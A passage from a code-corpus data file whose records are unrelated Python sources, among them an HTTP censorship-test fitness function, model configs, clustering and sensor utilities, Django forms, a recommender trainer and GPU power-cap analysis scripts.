HTTP test with no server\"\n if not url.startswith(\"http://\"):\n url = \"http://\" + url\n headers = {}\n if args.get('host_header'):\n headers[\"Host\"] = args.get('host_header')\n\n # If we've been given a non-standard port, append that to the URL\n port = args.get(\"port\", 80)\n if port != 80:\n url += \":%s\" % str(port)\n\n if args.get(\"bad_word\"):\n url += \"?q=%s\" % args.get(\"bad_word\")\n\n injected_http = args.get(\"injected_http_contains\")\n try:\n # res = requests.get(url, allow_redirects=False, timeout=600, headers=headers)\n req = requests.Request('GET', url).prepare()\n req.headers = headers\n req.method = 'GET'\n s = requests.Session()\n res = s.send(req, timeout=3)\n logger.debug(res.text)\n # If we need to monitor for an injected response, check that here\n if injected_http and injected_http in res.text:\n fitness -= 90\n else:\n if res.text == correct_response:\n fitness += 100\n else:\n fitness -= 90\n except requests.exceptions.ConnectTimeout as exc:\n logger.exception(\"Socket timeout.\")\n fitness -= 100\n except (requests.exceptions.ConnectionError, ConnectionResetError) as exc:\n logger.exception(\"Connection RST.\")\n fitness -= 90\n except urllib.error.URLError as exc:\n logger.debug(exc)\n fitness += -101\n # Timeouts generally mean the strategy killed the TCP stream.\n # HTTPError usually mean the request was destroyed.\n # Punish this more harshly than getting caught by the censor.\n except (requests.exceptions.Timeout, requests.exceptions.HTTPError) as exc:\n logger.debug(exc)\n logger.debug(\"OH NO! TIMEOUT OR HTTP ERROR!\")\n fitness += -120\n except Exception:\n logger.exception(\"Exception caught in HTTP test to site %s.\", url)\n fitness += -100\n return fitness * 4\n","sub_path":"plugins/http/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"267095765","text":"# Anotated Gigawords:\nroot = \"/home/dataset\"\ntrain_data_path = \troot + \"data/chunked/train/train_*\"\nvalid_data_path = \troot + \"data/chunked/valid/valid_*\"\ntest_data_path = \troot + \"data/chunked/test/test_*\"\nvocab_path = \t\troot + \"data/vocab\"\nsave_model_path = root + \"data/saved_models/Attn\"\n\n# Hyperparameters\nvocab_size = 100000 # Take most frequent vocab_size words. \nemb_dim = 300 # Dimension of Word Embedding.\nnum_of_predefined_words = 4 # [PAD], [UNK], [START], [STOP]\nbatch_size = 200 # mini-batch size.\nhidden_dim = 256 # number of units for LSTM.\ndiv_factor = 1000 # Divide remain length by 1000 to adjust the scope.\nlr = 0.001 # learning rate.\nmin_dec_steps = 3\n\nmax_enc_steps = 55\t\t # 99% of the articles are within length 55.\nmax_dec_steps = 30\t\t # 99% of the titles are within length 15, \nmax_word_len = 250 # \\Aleph used in LA.\n\n# Eval settings:\nbeam_size = 4 # Beam search size.\n\n# RL \n# -------------\nrl_reward_ratio = 10 # divide rl reward by 10 to match ROUGE score's scope.\nrl_len_reward_diff = 4 # reward the RL if len_diff is not bigger than 70.\neps = 1e-12\neps_denominator = 1e-11\n# -------------\n\nrand_unif_init_mag = 0.02 \ntrunc_norm_init_std = 1e-4\n\nmax_iterations = 50000 # Total iteration number.\nsave_model_checkpoint = 10000 # Every 10000 iterations, saves model parameters and infos.\nshow_train_message = 1000 # Every 1000 iterations, display training inforation.\nintra_encoder = True # Use intra_encoder Attention.\nintra_decoder = True # Use intra_decoder Attention.\nprint_eval_msg = False # Save evaluation message to files.\nDEBUG = False # For Debug.\nglove = True # Use glove\ncnndm = False\ngigawords = True\nlen_attn_visualization = False\ncount_space = False\n","sub_path":"LA_Atten/data_util/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30933220","text":"import random\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n# Split de dataset in tweeen. Training en test set. Seed kan toegevoegd worden naar wens\r\ndef split_dataset(data, split_ratio, seed=random.randint(0,9)):\r\n\trandom.seed(seed)\r\n\ttrain_size = int(len(data) * split_ratio)\r\n\ttrain_set = []\r\n\tcopy = list(data)\r\n\r\n\twhile len(train_set) < train_size:\r\n\t\tindex = random.randrange(len(copy))\r\n\t\ttrain_set.append(copy.pop(index))\r\n\treturn train_set, copy\r\n\r\n# Delete columns die niet nodig zijn\r\ndef clean_data(data, start, end):\r\n\tfor row in data:\r\n\t\tdel row[start:end]\r\n\treturn data\r\n\r\ndef plot_3d_clusters(data, clusters, outliers):\r\n\tfig = plt.figure()\r\n\tax = fig.add_subplot(111, projection='3d')\r\n\r\n\t# Lambda functie voor random kleur \r\n\tr = lambda: random.randint(0,255)\r\n\r\n\tcolor = '#000000'\r\n\tax1 = []\r\n\tax2 = []\r\n\tax3 = []\r\n\r\n\t# Plot outliers\r\n\tfor outlier in outliers:\r\n\t\tax1.append(data[outlier][0])\r\n\t\tax2.append(data[outlier][1])\r\n\t\tax3.append(data[outlier][2])\r\n\r\n\tax.scatter(ax1, ax2, ax3, c=color, marker='+')\r\n\r\n\t# Plot elke cluster met een andere kleur\r\n\tfor cluster in clusters:\r\n\t\tcolor = ('#%02X%02X%02X' % (r(),r(),r()))\r\n\t\tax1 = []\r\n\t\tax2 = []\r\n\t\tax3 = []\r\n\t\tfor point in cluster:\r\n\t\t\tax1.append(data[point][0])\r\n\t\t\tax2.append(data[point][1])\r\n\t\t\tax3.append(data[point][2])\r\n\r\n\t\tax.scatter(ax1, ax2, ax3, c=color)\r\n\tplt.show()\r\n\r\n# Zoek alle punten die niet in een cluster zitten\r\ndef not_in_cluster(data, in_cluster):\r\n\toutliers = []\r\n\r\n\ti = 0\r\n\tfor i in range(len(data)):\r\n\t\tif i not in in_cluster:\r\n\t\t\toutliers.append(i)\r\n\r\n\treturn outliers\r\n\r\n# Schrijf de clusters naar een text bestand\r\ndef clusters_to_text(clusters, filename):\r\n\tfile = open('datasets/' + str(filename)+'.txt', 'w')\r\n\r\n\tfor cluster in clusters:\r\n\t\tfile.write('Cluster: ' + str(clusters.index(cluster)) + '\\n')\r\n\t\tfor index in cluster:\r\n\t\t\tfile.write(str(index) + '\\n') \r\n\t\tfile.write('\\n')\r\n\r\n\tfile.close()\r\n\r\n# Schrijf clusters en outliers naar bestand om later herbruikt te worden\r\ndef save_clusters_and_outliers(clusters, outliers):\r\n\tif clusters:\r\n\t\tcluster_file = open('datasets/saved_clusters.csv', 'w')\r\n\t\twriter = csv.writer(cluster_file, delimiter=',')\r\n\t\tfor cluster in clusters:\r\n\t\t\twriter.writerow(cluster)\r\n\t\tcluster_file.close()\r\n\r\n\tif outliers:\r\n\t\toutlier_file = open('datasets/saved_outliers.csv', 'w')\r\n\t\twriter = csv.writer(outlier_file, delimiter=',')\r\n\t\twriter.writerow(outliers)\r\n\t\toutlier_file.close()\r\n\r\n# Maak een plot van de cluster en outlier bestanden\r\ndef make_plot_from_files(data):\r\n\tcluster_file = open('datasets/saved_clusters.csv', 'r')\r\n\r\n\treader = csv.reader(cluster_file)\r\n\tclusters = []\r\n\tfor line in reader:\r\n\t\tif line:\r\n\t\t\tclusters.append([int(i) for i in line])\r\n\t\t\r\n\toutlier_file = open('datasets/saved_outliers.csv', 'r')\r\n\treader = csv.reader(outlier_file)\r\n\tfor line in reader:\r\n\t\tif line:\r\n\t\t\toutliers = [int(i) for i in line]\r\n\r\n\tplot_3d_clusters(data, clusters, outliers)","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"472830546","text":"import logging\nimport numpy as np\nfrom piweather.sensors import Sensor\n\n\nclass DS18x20(Sensor):\n\n dtypes = {\n \"temperature\": float,\n }\n\n def __init__(self, path, *args, **kwargs):\n super(DS18x20, self).__init__(*args, **kwargs)\n self._path = path\n\n @property\n def path(self):\n return self._path\n\n def read(self):\n try:\n logging.debug(\"DS18x20: opening path: {}\".format(self.path))\n with open(self.path, \"r\") as f:\n lines = f.readlines()\n except FileNotFoundError:\n logging.error(\"DS18x20: File not found at {}\".format(self.path))\n return {\"temperature\": np.NaN}\n\n if self._crc_is_invalid(lines):\n logging.warning(\"DS18x20: invalid CRC\")\n return {\"temperature\": np.NaN}\n\n raw = self._extract_raw_temperature(lines)\n if raw == \"85000\":\n logging.warning(\"DS18x20: T=85000 error occured\")\n return {\"temperature\": np.NaN}\n\n return {\n \"temperature\": int(raw)/1000,\n }\n\n def _extract_raw_temperature(self, lines):\n last_token = lines[1].split(\" \")[-1]\n return last_token[len(\"t=\"):].strip()\n\n def _crc_is_invalid(self, lines):\n return \"YES\" not in lines[0]\n","sub_path":"piweather/sensors/DS18x20.py","file_name":"DS18x20.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"411834609","text":"from django import forms\nfrom ckeditor.widgets import CKEditorWidget\n\nfrom website.project.spam.model import SpamStatus\n\n\nclass EmailForm(forms.Form):\n author = forms.CharField(label='Author', max_length=100)\n email = forms.ChoiceField(label='Email')\n subject = forms.CharField(label='Subject', required=True)\n message = forms.CharField(label='Message', required=True,\n widget=CKEditorWidget())\n\n def __init__(self, *args, **kwargs):\n choices = kwargs.get('initial', {}).get('email', [])\n self.base_fields['email'] = forms.ChoiceField(choices=choices)\n super(EmailForm, self).__init__(*args, **kwargs)\n\n\nclass ConfirmForm(forms.Form):\n confirm = forms.ChoiceField(\n choices=[(SpamStatus.SPAM, 'Spam'), (SpamStatus.HAM, 'Ham')],\n widget=forms.RadioSelect(),\n )\n","sub_path":"admin/spam/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"401946519","text":"import numpy as np\nfrom draw import *\n\nK = 10\nL = 20\nn_batch = 50\n\n# ------------------------------------------------------------------ helpers\n\n# pad a list into its final length and also turn it into a numpy array\ndef pad_and_numpy(lst, final_length):\n # convert\n lst = [np.array(x, np.float32) for x in lst]\n length = len(lst)\n # crop if too long\n if length > final_length:\n return lst[:final_length]\n item_shape = lst[0].shape\n return lst + [np.zeros(item_shape, np.float32) for i in range(final_length - length)]\n\ndef dist(pt1, pt2):\n x1, y1 = pt1\n x2, y2 = pt2\n return np.sqrt(np.power(x1-x2,2) + np.power(y1-y2,2))\n\ndef coord_2_loc(coord, ll = L):\n ret = np.zeros([ll, ll, 1])\n for i in range(ll):\n for j in range(ll):\n grid_coord_i = i + 0.5\n grid_coord_j = j + 0.5\n ret[i][j][0] = np.exp(-dist((grid_coord_i, grid_coord_j), coord))\n return ret\n\ndef coord_2_loc_obs(coord, label, ll = L):\n chan_idx = 0 if label[0] == 1.0 else 1\n ret = np.zeros([ll, ll, 2])\n for i in range(ll):\n for j in range(ll):\n grid_coord_i = i + 0.5\n grid_coord_j = j + 0.5\n ret[i][j][chan_idx] = np.exp(-dist((grid_coord_i, grid_coord_j), coord))\n return ret\n\n# show dimension of a data object (list of list or a tensor)\ndef show_dim(lst1):\n if hasattr(lst1, '__len__') and len(lst1) > 0:\n return [len(lst1), show_dim(lst1[0])]\n else:\n try:\n return lst1.get_shape()\n except:\n try:\n return lst1.shape\n except:\n return type(lst1)\n\n# --------------------------------------------------------------- modelings\n# generate the hidden state\ndef gen_Z(ll = L):\n x_coord = np.random.random() * ll\n y_coord = np.random.random() * ll\n return x_coord, y_coord\n\ndef gen_X(Z, ll = L):\n ll = float(ll)\n Xx = np.random.random() * ll\n Xy = np.random.random() * ll\n X = (Xx, Xy)\n if dist(Z,X) < ll / 2.0:\n return X, [1.0, 0.0]\n else:\n return X, [0.0, 1.0]\n \n# data of the form of\n# k_locs: the k observation locations\n# k_TFs: the true/false value of these observations\n# k_weights: the average 1/k weight for each observation\n# query_loc: the new query location\n# query_TF: the TF for that particular new query\n# z_loc: the location for the hidden state Z\n# all variables are a list of tensors of dimention [n_batch x ...] \ndef gen_data(n_batch = n_batch, K=K):\n # LIST of length K (1 for each input)\n # each element of shape [batch x loc]\n k_locs = [[] for i in range(K)]\n # tensor shape [batch x K] (no more list after trying to join together)\n k_weights = []\n # tensor shape of [batch x loc]\n query_loc = []\n # tensor shape of [batch x 2] (2 classes, T or F)\n query_TF = []\n # tensor shape of [batch x loc]\n z_loc = []\n\n for bb in range(n_batch):\n # generate a hidden variable Z for each batch\n Z_coord = gen_Z()\n _z_loc = coord_2_loc(Z_coord)\n z_loc.append(_z_loc)\n # generate and add query location\n _query_coord, _query_TF = gen_X(Z_coord)\n _query_loc = coord_2_loc(_query_coord)\n query_loc.append(_query_loc)\n query_TF.append(_query_TF)\n # for each batch, decide how many sample observations we want to draw\n k = np.random.randint(1,K)\n # then re-weight each input layer by the appropriate weight\n _k_weights = [0.0 for _ in range(K)]\n _k_weights[k-1] = 1.0\n k_weights.append(_k_weights)\n\n # for easier padding and such, generate these for each batch then mush them in\n # only the list of tensors need this treatment, otherwise just batch them in ok\n b_k_locs = []\n for _ in range(k):\n obs_x, obs_lab = gen_X(Z_coord)\n obs_x_loc = coord_2_loc_obs(obs_x, obs_lab)\n b_k_locs.append(obs_x_loc)\n\n b_k_locs = pad_and_numpy(b_k_locs, K) \n for kkk in range(K):\n k_locs[kkk].append(b_k_locs[kkk]) \n\n return k_locs, \\\n np.array(k_weights, np.float32), \\\n np.array(query_loc, np.float32), \\\n np.array(query_TF, np.float32), \\\n np.array(z_loc, np.float32)\n \n# dat_in, dat_out = gen_data()\n# print np.shape(dat_in)\n# print dat_out\n \n\n#sqs = gen_squares()\n#draw(gen_squares())\n# Z = gen_Z()\n# print Z\n# draw(coord_2_loc(Z))\n\n","sub_path":"pokemon2/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"167366991","text":"from loggers import *\nfrom config import STATE_DICT_KEY, OPTIMIZER_STATE_DICT_KEY\nfrom utils import AverageMeterSet\nfrom pruners import smallweightprune\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\n\n\nfrom abc import *\nfrom pathlib import Path\n\n\nclass AbstractTrainer(metaclass=ABCMeta):\n def __init__(self, args, model, train_loader, val_loader, test_loader, export_root, pruner):\n self.args = args\n self.device = args.device\n self.model = model.to(self.device)\n self.is_parallel = args.num_gpu > 1\n if self.is_parallel:\n self.model = nn.DataParallel(self.model)\n\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.test_loader = test_loader\n self.optimizer = self._create_optimizer()\n self.lr_scheduler = optim.lr_scheduler.StepLR(self.optimizer, step_size=args.decay_step, gamma=args.gamma)\n\n self.num_epochs = args.num_epochs\n self.metric_ks = args.metric_ks\n self.best_metric = args.best_metric\n\n self.export_root = export_root\n self.writer, self.train_loggers, self.val_loggers = self._create_loggers()\n self.add_extra_loggers()\n self.logger_service = LoggerService(self.train_loggers, self.val_loggers)\n self.log_period_as_iter = args.log_period_as_iter\n\n self.pruner = pruner\n self.prune_code = args.prune_code\n self.pruning_perc = args.pruning_perc\n self.pruning_perc_embed = args.pruning_perc_embed\n self.pruning_perc_feed = args.pruning_perc_feed\n self.num_prune_epochs = args.num_prune_epochs\n self.prune_code = args.prune_code\n self.dataset_code = args.dataset_code\n\n\n @abstractmethod\n def add_extra_loggers(self):\n pass\n\n @abstractmethod\n def log_extra_train_info(self, log_data):\n pass\n\n @classmethod\n @abstractmethod\n def code(cls):\n pass\n\n @abstractmethod\n def calculate_loss(self, batch):\n pass\n\n @abstractmethod\n def calculate_metrics(self, batch):\n pass\n\n def train(self):\n accum_iter = 0\n self.validate(0, accum_iter)\n for epoch in range(self.num_epochs):\n accum_iter = self.train_one_epoch(epoch, accum_iter)\n self.validate(epoch, accum_iter)\n self.logger_service.complete({\n 'state_dict': (self._create_state_dict()),\n })\n self.writer.close()\n \n def prune(self):\n accum_iter = 0\n self.validate(0, accum_iter)\n for epoch in range(self.num_prune_epochs):\n accum_iter = self.train_one_epoch(epoch, accum_iter, True)\n self.validate(epoch, accum_iter)\n self.logger_service.complete({\n 'state_dict': (self._create_state_dict()),\n })\n self.writer.close()\n\n \n def train_one_epoch(self, epoch, accum_iter, do_prune=False):\n self.model.train()\n self.lr_scheduler.step()\n\n average_meter_set = AverageMeterSet()\n tqdm_dataloader = tqdm(self.train_loader)\n\n if do_prune:\n masks = self.pruner.weight_prune(self.model, self.pruning_perc, self.pruning_perc_embed, self.pruning_perc_feed)\n self.model.set_masks(masks)\n \n for batch_idx, batch in enumerate(tqdm_dataloader):\n batch_size = batch[0].size(0)\n batch = [x.to(self.device) for x in batch]\n\n self.optimizer.zero_grad()\n\n loss = self.calculate_loss(batch)\n loss.backward()\n\n self.optimizer.step()\n\n average_meter_set.update('loss', loss.item())\n tqdm_dataloader.set_description(\n 'Epoch {}, loss {:.3f} '.format(epoch+1, average_meter_set['loss'].avg))\n\n accum_iter += batch_size\n\n if self._needs_to_log(accum_iter):\n tqdm_dataloader.set_description('Logging to Tensorboard')\n log_data = {\n 'state_dict': (self._create_state_dict()),\n 'epoch': epoch,\n 'accum_iter': accum_iter,\n }\n log_data.update(average_meter_set.averages())\n self.log_extra_train_info(log_data)\n self.logger_service.log_train(log_data)\n\n return accum_iter\n\n def validate(self, epoch, accum_iter):\n self.model.eval()\n\n average_meter_set = AverageMeterSet()\n\n with torch.no_grad():\n tqdm_dataloader = tqdm(self.val_loader)\n for batch_idx, batch in enumerate(tqdm_dataloader):\n batch = [x.to(self.device) for x in batch]\n\n metrics = self.calculate_metrics(batch)\n\n for k, v in metrics.items():\n average_meter_set.update(k, v)\n description_metrics = ['NDCG@%d' % k for k in self.metric_ks[:3]] +\\\n ['Recall@%d' % k for k in self.metric_ks[:3]]\n description = 'Val: ' + ', '.join(s + ' {:.3f}' for s in description_metrics)\n description = description.replace('NDCG', 'N').replace('Recall', 'R')\n description = description.format(*(average_meter_set[k].avg for k in description_metrics))\n tqdm_dataloader.set_description(description)\n\n log_data = {\n 'state_dict': (self._create_state_dict()),\n 'epoch': epoch,\n 'accum_iter': accum_iter,\n }\n log_data.update(average_meter_set.averages())\n self.logger_service.log_val(log_data)\n\n def test(self):\n self.model.eval()\n\n average_meter_set = AverageMeterSet()\n\n with torch.no_grad():\n tqdm_dataloader = tqdm(self.test_loader)\n for batch_idx, batch in enumerate(tqdm_dataloader):\n batch = [x.to(self.device) for x in batch]\n\n metrics = self.calculate_metrics(batch)\n\n for k, v in metrics.items():\n average_meter_set.update(k, v)\n description_metrics = ['NDCG@%d' % k for k in self.metric_ks[:3]] +\\\n ['Recall@%d' % k for k in self.metric_ks[:3]]\n description = 'Test: ' + ', '.join(s + ' {:.3f}' for s in description_metrics)\n description = description.replace('NDCG', 'N').replace('Recall', 'R')\n description = description.format(*(average_meter_set[k].avg for k in description_metrics))\n tqdm_dataloader.set_description(description)\n return {\n 'dataset': self.dataset_code,\n 'pruning_code': self.prune_code,\n 'pruning_perc': self.pruning_perc,\n 'pruning_perc_embed': self.pruning_perc_embed,\n 'pruning_perc_feed': self.pruning_perc_feed,\n 'pruning_epochs': self.num_prune_epochs,\n 'num_epochs': self.num_epochs,\n 'result': description,\n }\n\n\n def _create_optimizer(self):\n args = self.args\n if args.optimizer.lower() == 'adam':\n return optim.Adam(self.model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n elif args.optimizer.lower() == 'sgd':\n return optim.SGD(self.model.parameters(), lr=args.lr, weight_decay=args.weight_decay, momentum=args.momentum)\n else:\n raise ValueError\n\n def _create_loggers(self):\n root = Path(self.export_root)\n writer = SummaryWriter(root.joinpath('logs'))\n model_checkpoint = root.joinpath('models')\n\n train_loggers = [\n MetricGraphPrinter(writer, key='epoch', graph_name='Epoch', group_name='Train'),\n MetricGraphPrinter(writer, key='loss', graph_name='Loss', group_name='Train'),\n ]\n\n val_loggers = []\n for k in self.metric_ks:\n val_loggers.append(\n MetricGraphPrinter(writer, key='NDCG@%d' % k, graph_name='NDCG@%d' % k, group_name='Validation'))\n val_loggers.append(\n MetricGraphPrinter(writer, key='Recall@%d' % k, graph_name='Recall@%d' % k, group_name='Validation'))\n val_loggers.append(RecentModelLogger(model_checkpoint))\n val_loggers.append(BestModelLogger(model_checkpoint, metric_key=self.best_metric))\n return writer, train_loggers, val_loggers\n\n def _create_state_dict(self):\n return {\n STATE_DICT_KEY: self.model.module.state_dict() if self.is_parallel else self.model.state_dict(),\n OPTIMIZER_STATE_DICT_KEY: self.optimizer.state_dict(),\n }\n\n def _needs_to_log(self, accum_iter):\n return accum_iter % self.log_period_as_iter < self.args.train_batch_size and accum_iter != 0","sub_path":"trainers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"261279033","text":"\n\nfrom xai.brain.wordbase.nouns._guardian import _GUARDIAN\n\n#calss header\nclass _GUARDIANS(_GUARDIAN, ):\n\tdef __init__(self,): \n\t\t_GUARDIAN.__init__(self)\n\t\tself.name = \"GUARDIANS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"guardian\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_guardians.py","file_name":"_guardians.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"228037937","text":"import config\nimport time\nimport log\nimport threading\n\nclass user_cache:\n\n invalidate_interval = config.get('user_cache.invalidate_interval', 'i')\n\n def __init__(self, api, fields):\n self.api = api\n self.fields = fields\n self.users = {}\n self.lock = threading.RLock()\n\n def load(self, uid, clean=False):\n uid = list(map(int, uid))\n\n try:\n to_get = []\n with self.lock:\n ctime = time.time()\n for user in uid:\n if user > 0 and (clean or user not in self.users or self.users[user][0] + self.invalidate_interval - 5 < ctime):\n to_get.append(user)\n if to_get:\n resp = self.api.users.get(user_ids=','.join(map(str, to_get)), fields=self.fields)\n for user in resp:\n self.users[user['id']] = (ctime, user)\n except Exception:\n log.error('user_cache error', True)\n return None\n\n def __getitem__(self, uid):\n uid = int(uid)\n try:\n with self.lock:\n if uid not in self.users or self.users[uid][0] + self.invalidate_interval < time.time():\n self.load([uid])\n return self.users[uid][1]\n except Exception:\n log.error('user_cache error', True)\n return None\n\n def __delitem__(self, uid):\n uid = int(uid)\n with self.lock:\n if uid in self.users:\n del self.users[uid]\n\n def clear(self):\n with self.lock:\n self.users = {}\n\n def gc(self):\n with self.lock:\n t = time.time()\n for uid in list(self.users):\n if self.users[uid][0] + self.invalidate_interval < t:\n del self.users[uid]\n","sub_path":"user_cache.py","file_name":"user_cache.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"101230046","text":"#%load_ext autoreload\n#%autoreload 2\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport matplotlib as mpl\nfrom pathlib import Path\nfrom datetime import datetime\nimport pint\nunit = pint.UnitRegistry()\nmpl.rcParams['figure.dpi'] = 300\n\nfrom util import *\n\n\n# %%\nGPU1=1\ndevices=[GPU1]\npower_caps = [150, 200, 250, 300]\n\n#%%\ndef load_power_cap_data(data_root, network, epoch_count):\n \n data_root = Path(data_root)\n runs = list(data_root.glob(\"run*\"))\n\n all_data = []\n\n for cap in power_caps:\n for run in runs:\n description = f\"powercap{cap}-{network}\"\n #print(description)\n data_path = list(run.glob(f\"{description}*\"))[0]\n power_data = PowerData.load(data_path)\n #assert power_data.t_info.get_epoch_count() == epoch_count, f\"Unexpected Number of epochs! Expected: {epoch_count}, but got: {power_data.t_info.get_epoch_count()} in {data_path}\"\n #epoch_energy = get_energy_per_epoch(power_data, devices=devices)\n #energy = np.mean(epoch_energy[1:])\n \n #epoch_times = power_data.t_info.get_time_per_epoch()\n #mean_time = np.mean(epoch_times[1:])\n print(description)\n \n total_time = power_data.t_info.total_experiment_duration() / np.timedelta64(1, \"s\")\n total_energy = calculate_total_energy(power_data, devices=devices\n , start=power_data.t_info.experiment_begin()\n , end=power_data.t_info.experiment_end())\n \n edp = total_energy * total_time\n\n cum_energy = calculate_total_cumulative_energy(power_data, devices=devices\n , start=power_data.t_info.experiment_begin()\n , end=power_data.t_info.experiment_end())[0]\n\n tmp = {\n \"power_cap\":cap\n ,\"total_time\":total_time\n ,\"total_energy\":total_energy\n ,\"cum_energy\": cum_energy\n ,\"edp\": edp\n ,\"run\": str(run).split(\"/\")[-1].replace(\"run\",\"\")\n ,\"power_data\": power_data\n }\n all_data.append(tmp)\n return all_data\n\n# %%\ndef plot_all(df, net):\n plot_power_raw(df, devices[0], net)\n plt.clf()\n plot_cum_energy(df,net)\n plt.clf()\n # epoch_times_boxplot(df, net)\n # plt.clf()\n # epoch_energy_boxplot(df, net)\n # plt.clf()\n plot_mean_total_energy(df, net)\n plt.clf()\n plot_mean_edp(df, net)\n plt.clf()\n plot_mean_total_time(df, net)\n\n\n\n# %%\ndef plot_power_raw(df, device_idx, net):\n fig, ax = plt.subplots(len(power_caps), 1, sharex=True)\n for index,(_, pl) in enumerate(df[df._run == \"1\"].iterrows()):\n current_ax = ax[index]\n power_data = pl[\"power_data\"]\n device = power_data.power_gpu[power_data.power_gpu[\"gpu-index\"] == device_idx]\n timestamps = (np.array(device.timestamp) - np.array(device.timestamp)[0]) / np.timedelta64(1, \"s\")\n current_ax.plot(timestamps, device.power)\n current_ax.set_ylim(0,310)\n\n # for i, epoch_begin, _ in power_data.t_info.epochs():\n # epoch_ts = (epoch_begin - np.array(device.timestamp)[0]) / np.timedelta64(1, \"s\")\n # current_ax.axvline(x=epoch_ts,color='orange',linestyle='--')\n current_ax.set_ylabel(\"Power [W]\")\n current_ax.set_xlabel(\"Time [s]\")\n fig.suptitle(f\"[{net}]GPU Power vs. Time w/ Power Limits [150, 200 ,250, 300]\")\n #plt.tight_layout() \n plt.show()\n plt.savefig(fig_root/f\"{net}-power-raw.png\")\n\n\n#plot_power_raw(mnist_data_big, devices[0], \"mnist-big\")\n# %%\n\ndef plot_cum_energy(df, net):\n runs = df.groupby(\"run\")\n for run_idx, run in runs:\n pl_list =[]\n for pl_idx, pl in run.groupby(\"power_cap\"):\n pl = pl.iloc[0]\n pl_list.append(pl_idx)\n #epoch2_begin = pl.power_data.t_info.get_epoch_begin(1)\n\n plt.plot(pl.cum_energy/MEGA)\n #plt.plot((epoch2_begin-pl.power_data.power_gpu.iloc[0].timestamp)/np.timedelta64(1,\"s\"),0,\"x\")\n plt.legend([f\"{x}W\" for x in pl_list])\n plt.title(f\"[{net}]Cumulative Energy w/ Power Limits (Run {run_idx})\")\n plt.xlabel(\"Time [$s$]\")\n plt.ylabel(\"Energy [$MJ$]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-cum-energy-{run_idx}.png\")\n plt.clf()\n\n#plot_cum_energy(mnist_data_big)\n\n# %%\ndef epoch_times_hist(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_times[1:])\n \n plt.hist(times[pl_idx], bins=30)\n plt.title(f\"[{net}]Distribution of Time per Epoch ({pl_idx}W)\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-times-hist-{pl_idx}.png\")\n\n\n#epoch_times_hist(mnist_data_big)\n\n\n# %%\ndef epoch_times_boxplot(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_times[1:])\n \n plt.boxplot(times.values())\n plt.xticks(*zip(*enumerate([f\"{x}W\" for x in times.keys()],1)))\n plt.title(f\"[{net}]Time per Epoch\")\n plt.ylabel(\"Time [s]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-times-boxplot.png\")\n\n\n#epoch_times_boxplot(mnist_data_big)\n\n\n\n# %%\ndef epoch_energy_hist(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_energy[1:])\n \n plt.hist(times[pl_idx], bins=30)\n plt.title(f\"[{net}]Distribution of Energy per Epoch ({pl_idx}W)\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-energy-hist-{pl_idx}.png\")\n\n\n#epoch_energy_hist(mnist_data_big)\n\n\n# %%\ndef epoch_energy_boxplot(df, net):\n times = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n times[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n times[pl_idx].extend(run.epoch_energy[1:])\n \n plt.boxplot(times.values())\n plt.xticks(*zip(*enumerate([f\"{x}W\" for x in times.keys()],1)))\n plt.title(f\"[{net}]Energy per Epoch\")\n plt.ylabel(\"Energy [J]\")\n plt.show()\n plt.savefig(fig_root/f\"{net}-epoch-energy-boxplot.png\")\n\n\n#epoch_energy_boxplot(mnist_data_big)\n\n# %%\ndef plot_mean_metric(df, metric, net, scale):\n energy = {}\n for pl_idx, pl in df.groupby(\"power_cap\"):\n energy[pl_idx] = []\n for run_idx, run in pl.groupby(\"run\"):\n run = run.iloc[0]\n energy[pl_idx].append(run[metric])\n \n plt.plot([x for x in energy.keys()], np.array([np.array(x).mean() for x in energy.values()]) / scale, \"x\")\n plt.xlabel(\"Power Limit [W]\")\n plt.xticks(power_caps)\n\n# %%\ndef 